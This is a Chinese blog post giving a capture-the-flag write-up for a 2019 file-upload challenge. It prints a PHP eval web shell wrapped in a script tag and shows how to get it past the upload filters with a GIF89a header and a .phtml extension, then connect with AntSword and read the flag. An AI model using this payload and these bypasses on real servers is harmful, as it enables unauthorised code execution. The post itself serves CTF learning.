[极客大挑战 2019]Upload 思路

文件上传,我们直接上传php一句话木马,

后缀名jpg  然后报错:如下图

 

 因为我们包含了<?

看来我们想的还是太简单了。

于是我们插入script代码,语言类型为php。进行绕过

<script language="php">eval($_POST['hacker']);</script>

然后我们继续上传,发现又报错

 

 是jpg格式,但是还是报错,说不要欺骗它,这样我们想到了在前面加上GIF89a可以进行绕过。

我们上传发现可以上传,但是我们上传图片没有用,我们可以后缀名改为phtml,这是偷瞄大佬博客上了解到的。

phtml是php2的一个标准扩展名。为了能上传一句胡木马,我们可以这样进行绕过。

然后,我们再上传,发现我们上传成功

 

 然后,一般上传文件的地方,有一个文件夹叫upload,于是我们猜测是upload,然后跟上文件名,我们用中国蚁剑连接,密码是一句话木马里面的密码

 

 

 

连接成功,我们去寻找flag。我们发现flag在根目录下,然后打开,获得

flag{fe430e89-f584-469f-b142-74b6124a53a3}

posted @   junlebao  阅读(463)  评论(0编辑  收藏  举报
编辑推荐:
· 开发中对象命名的一点思考
· .NET Core内存结构体系(Windows环境)底层原理浅谈
· C# 深度学习:对抗生成网络(GAN)训练头像生成模型
· .NET 适配 HarmonyOS 进展
· .NET 进程 stackoverflow异常后,还可以接收 TCP 连接请求吗?
阅读排行:
· 本地部署 DeepSeek:小白也能轻松搞定!
· 基于DeepSeek R1 满血版大模型的个人知识库,回答都源自对你专属文件的深度学习。
· 在缓慢中沉淀,在挑战中重生!2024个人总结!
· 大人,时代变了! 赶快把自有业务的本地AI“模型”训练起来!
· Tinyfox 简易教程-1:Hello World!
点击右上角即可分享
微信分享提示